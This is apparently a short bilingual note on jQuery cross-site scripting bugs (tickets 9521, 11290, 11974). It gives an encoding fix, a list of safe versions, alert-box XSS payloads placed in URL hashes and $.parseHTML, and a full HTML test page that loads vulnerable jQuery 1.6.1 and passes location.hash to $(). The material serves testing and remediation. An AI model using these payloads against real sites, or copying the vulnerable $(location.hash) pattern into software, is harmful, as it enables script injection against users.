jQuery XSS漏洞处理方式
jQuery CSS selector, Client Potential XSS
解决方法:
使用 encodeURIComponent 编码输入的信息,
jQuery with XSSDemo:
Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!
Test version:
Safe version:
1.12.0, 1.12.1
2.2.0, 2.2.1
3.0.0, 3.0.1, 3.1.0, 3.1.1
jQuery XSS Payload:
url?#<img src=/ onerror=alert(1)>
#<img src=/ onerror=alert(1)> #p[class='<img src=/ onerror=alert(2)>']
测试文件:
<!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Jquery XSS</title> <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.6.1/jquery.js"></script> <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> --> <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> --> <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> --> <script> $(function () { // #9521 // #11290 $(location.hash); // #11974 $('#bug').on('click', function () { $.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>"); return false; }); }) </script> </head> <body> <h1>jQuery with XSS</h1> <h2>Demo:</h2> <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p> <ul> <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li> <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li> <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974" target="_blank">ticket</a></li> </ul> <h2>Test version:</h2> <ul> <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li> </ul> <h2>Safe version:</h2> <ul> <li>1.12.0, 1.12.1 </li> <li>2.2.0, 2.2.1</li> <li>3.0.0, 3.0.1, 3.1.0, 3.1.1</li> </ul> </body> </html>
http://research.insecurelabs.org/jquery/test/